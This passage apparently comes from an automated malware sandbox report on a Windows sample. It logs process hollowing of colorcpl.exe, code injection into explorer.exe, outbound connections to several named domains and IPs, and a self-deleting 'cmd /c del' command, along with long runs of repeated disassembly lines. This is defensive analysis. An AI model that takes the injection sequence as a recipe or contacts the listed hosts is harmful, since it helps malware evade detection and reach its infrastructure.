Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h] 15_2_046F2D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h] 15_2_046F2D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472FD9B mov eax, dword ptr fs:[00000030h] 15_2_0472FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472FD9B mov eax, dword ptr fs:[00000030h] 15_2_0472FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04722581 mov eax, dword ptr fs:[00000030h] 15_2_04722581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04722581 mov eax, dword ptr fs:[00000030h] 15_2_04722581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04722581 mov eax, dword ptr fs:[00000030h] 15_2_04722581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04722581 mov eax, dword ptr fs:[00000030h] 15_2_04722581
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h] 15_2_0471AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h] 15_2_0471AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h] 15_2_0471AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h] 15_2_0471AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h] 15_2_0471AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470766D mov eax, dword ptr fs:[00000030h] 15_2_0470766D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h] 15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h] 15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h] 15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h] 15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h] 15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h] 15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BAE44 mov eax, dword ptr fs:[00000030h] 15_2_047BAE44
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BAE44 mov eax, dword ptr fs:[00000030h] 15_2_047BAE44
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047AFE3F mov eax, dword ptr fs:[00000030h] 15_2_047AFE3F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FE620 mov eax, dword ptr fs:[00000030h] 15_2_046FE620
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472A61C mov eax, dword ptr fs:[00000030h] 15_2_0472A61C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472A61C mov eax, dword ptr fs:[00000030h] 15_2_0472A61C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FC600 mov eax, dword ptr fs:[00000030h] 15_2_046FC600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FC600 mov eax, dword ptr fs:[00000030h] 15_2_046FC600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FC600 mov eax, dword ptr fs:[00000030h] 15_2_046FC600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04728E00 mov eax, dword ptr fs:[00000030h] 15_2_04728E00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1608 mov eax, dword ptr fs:[00000030h] 15_2_047B1608
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047216E0 mov ecx, dword ptr fs:[00000030h] 15_2_047216E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047076E2 mov eax, dword ptr fs:[00000030h] 15_2_047076E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C8ED6 mov eax, dword ptr fs:[00000030h] 15_2_047C8ED6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04738EC7 mov eax, dword ptr fs:[00000030h] 15_2_04738EC7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047AFEC0 mov eax, dword ptr fs:[00000030h] 15_2_047AFEC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047236CC mov eax, dword ptr fs:[00000030h] 15_2_047236CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047746A7 mov eax, dword ptr fs:[00000030h] 15_2_047746A7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C0EA5 mov eax, dword ptr fs:[00000030h] 15_2_047C0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C0EA5 mov eax, dword ptr fs:[00000030h] 15_2_047C0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C0EA5 mov eax, dword ptr fs:[00000030h] 15_2_047C0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478FE87 mov eax, dword ptr fs:[00000030h] 15_2_0478FE87
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470FF60 mov eax, dword ptr fs:[00000030h] 15_2_0470FF60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C8F6A mov eax, dword ptr fs:[00000030h] 15_2_047C8F6A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470EF40 mov eax, dword ptr fs:[00000030h] 15_2_0470EF40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F4F2E mov eax, dword ptr fs:[00000030h] 15_2_046F4F2E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F4F2E mov eax, dword ptr fs:[00000030h] 15_2_046F4F2E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472E730 mov eax, dword ptr fs:[00000030h] 15_2_0472E730
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471F716 mov eax, dword ptr fs:[00000030h] 15_2_0471F716
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478FF10 mov eax, dword ptr fs:[00000030h] 15_2_0478FF10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478FF10 mov eax, dword ptr fs:[00000030h] 15_2_0478FF10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C070D mov eax, dword ptr fs:[00000030h] 15_2_047C070D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C070D mov eax, dword ptr fs:[00000030h] 15_2_047C070D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472A70E mov eax, dword ptr fs:[00000030h] 15_2_0472A70E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472A70E mov eax, dword ptr fs:[00000030h] 15_2_0472A70E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047337F5 mov eax, dword ptr fs:[00000030h] 15_2_047337F5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04777794 mov eax, dword ptr fs:[00000030h] 15_2_04777794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04777794 mov eax, dword ptr fs:[00000030h] 15_2_04777794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04777794 mov eax, dword ptr fs:[00000030h] 15_2_04777794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04708794 mov eax, dword ptr fs:[00000030h] 15_2_04708794
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B2073 mov eax, dword ptr fs:[00000030h] 15_2_047B2073
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C1074 mov eax, dword ptr fs:[00000030h] 15_2_047C1074
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04710050 mov eax, dword ptr fs:[00000030h] 15_2_04710050
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04710050 mov eax, dword ptr fs:[00000030h] 15_2_04710050
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h] 15_2_0470B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h] 15_2_0470B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h] 15_2_0470B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h] 15_2_0470B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472002D mov eax, dword ptr fs:[00000030h] 15_2_0472002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472002D mov eax, dword ptr fs:[00000030h] 15_2_0472002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472002D mov eax, dword ptr fs:[00000030h] 15_2_0472002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472002D mov eax, dword ptr fs:[00000030h] 15_2_0472002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472002D mov eax, dword ptr fs:[00000030h] 15_2_0472002D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04777016 mov eax, dword ptr fs:[00000030h] 15_2_04777016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04777016 mov eax, dword ptr fs:[00000030h] 15_2_04777016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04777016 mov eax, dword ptr fs:[00000030h] 15_2_04777016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C4015 mov eax, dword ptr fs:[00000030h] 15_2_047C4015
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C4015 mov eax, dword ptr fs:[00000030h] 15_2_047C4015
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F58EC mov eax, dword ptr fs:[00000030h] 15_2_046F58EC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F40E1 mov eax, dword ptr fs:[00000030h] 15_2_046F40E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F40E1 mov eax, dword ptr fs:[00000030h] 15_2_046F40E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F40E1 mov eax, dword ptr fs:[00000030h] 15_2_046F40E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478B8D0 mov ecx, dword ptr fs:[00000030h] 15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h] 15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472F0BF mov ecx, dword ptr fs:[00000030h] 15_2_0472F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472F0BF mov eax, dword ptr fs:[00000030h] 15_2_0472F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472F0BF mov eax, dword ptr fs:[00000030h] 15_2_0472F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h] 15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h] 15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h] 15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h] 15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h] 15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h] 15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047390AF mov eax, dword ptr fs:[00000030h] 15_2_047390AF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F9080 mov eax, dword ptr fs:[00000030h] 15_2_046F9080
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04773884 mov eax, dword ptr fs:[00000030h] 15_2_04773884
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04773884 mov eax, dword ptr fs:[00000030h] 15_2_04773884
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FC962 mov eax, dword ptr fs:[00000030h] 15_2_046FC962
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FB171 mov eax, dword ptr fs:[00000030h] 15_2_046FB171
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FB171 mov eax, dword ptr fs:[00000030h] 15_2_046FB171
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471B944 mov eax, dword ptr fs:[00000030h] 15_2_0471B944
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471B944 mov eax, dword ptr fs:[00000030h] 15_2_0471B944
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472513A mov eax, dword ptr fs:[00000030h] 15_2_0472513A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472513A mov eax, dword ptr fs:[00000030h] 15_2_0472513A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04714120 mov eax, dword ptr fs:[00000030h] 15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04714120 mov eax, dword ptr fs:[00000030h] 15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04714120 mov eax, dword ptr fs:[00000030h] 15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04714120 mov eax, dword ptr fs:[00000030h] 15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04714120 mov ecx, dword ptr fs:[00000030h] 15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F9100 mov eax, dword ptr fs:[00000030h] 15_2_046F9100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F9100 mov eax, dword ptr fs:[00000030h] 15_2_046F9100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F9100 mov eax, dword ptr fs:[00000030h] 15_2_046F9100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FB1E1 mov eax, dword ptr fs:[00000030h] 15_2_046FB1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FB1E1 mov eax, dword ptr fs:[00000030h] 15_2_046FB1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FB1E1 mov eax, dword ptr fs:[00000030h] 15_2_046FB1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047841E8 mov eax, dword ptr fs:[00000030h] 15_2_047841E8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047751BE mov eax, dword ptr fs:[00000030h] 15_2_047751BE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047751BE mov eax, dword ptr fs:[00000030h] 15_2_047751BE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047751BE mov eax, dword ptr fs:[00000030h] 15_2_047751BE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047751BE mov eax, dword ptr fs:[00000030h] 15_2_047751BE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047769A6 mov eax, dword ptr fs:[00000030h] 15_2_047769A6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047261A0 mov eax, dword ptr fs:[00000030h] 15_2_047261A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047261A0 mov eax, dword ptr fs:[00000030h] 15_2_047261A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h] 15_2_047B49A4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h] 15_2_047B49A4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h] 15_2_047B49A4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h] 15_2_047B49A4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04722990 mov eax, dword ptr fs:[00000030h] 15_2_04722990
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471C182 mov eax, dword ptr fs:[00000030h] 15_2_0471C182
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472A185 mov eax, dword ptr fs:[00000030h] 15_2_0472A185
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0473927A mov eax, dword ptr fs:[00000030h] 15_2_0473927A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047AB260 mov eax, dword ptr fs:[00000030h] 15_2_047AB260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047AB260 mov eax, dword ptr fs:[00000030h] 15_2_047AB260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C8A62 mov eax, dword ptr fs:[00000030h] 15_2_047C8A62
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BEA55 mov eax, dword ptr fs:[00000030h] 15_2_047BEA55
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h] 15_2_046F9240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h] 15_2_046F9240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h] 15_2_046F9240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h] 15_2_046F9240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04784257 mov eax, dword ptr fs:[00000030h] 15_2_04784257
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04734A2C mov eax, dword ptr fs:[00000030h] 15_2_04734A2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04734A2C mov eax, dword ptr fs:[00000030h] 15_2_04734A2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04713A1C mov eax, dword ptr fs:[00000030h] 15_2_04713A1C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BAA16 mov eax, dword ptr fs:[00000030h] 15_2_047BAA16
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BAA16 mov eax, dword ptr fs:[00000030h] 15_2_047BAA16
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FAA16 mov eax, dword ptr fs:[00000030h] 15_2_046FAA16
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FAA16 mov eax, dword ptr fs:[00000030h] 15_2_046FAA16
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04708A0A mov eax, dword ptr fs:[00000030h] 15_2_04708A0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F5210 mov eax, dword ptr fs:[00000030h] 15_2_046F5210
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F5210 mov ecx, dword ptr fs:[00000030h] 15_2_046F5210
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F5210 mov eax, dword ptr fs:[00000030h] 15_2_046F5210
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F5210 mov eax, dword ptr fs:[00000030h] 15_2_046F5210
Enables debug privileges
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\colorcpl.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe Network Connect: 142.111.47.2 80
Source: C:\Windows\explorer.exe Domain query: www.yunlimall.com
Source: C:\Windows\explorer.exe Domain query: www.thesoulrevitalist.com
Source: C:\Windows\explorer.exe Domain query: www.cleanxcare.com
Source: C:\Windows\explorer.exe Network Connect: 103.120.12.113 80
Source: C:\Windows\explorer.exe Network Connect: 148.59.128.71 80
Source: C:\Windows\explorer.exe Domain query: www.newmopeds.com
Source: C:\Windows\explorer.exe Domain query: www.dmgt4m2g8y2uh.net
Source: C:\Windows\explorer.exe Domain query: www.hazard-protection.com
Source: C:\Windows\explorer.exe Domain query: www.jonathan-mandt.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 78.31.67.91 80
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Memory written: C:\Users\user\Desktop\UOMp9cDcqZ.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 380000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Process created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000000.251486008.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Users\user\Desktop\UOMp9cDcqZ.exe VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
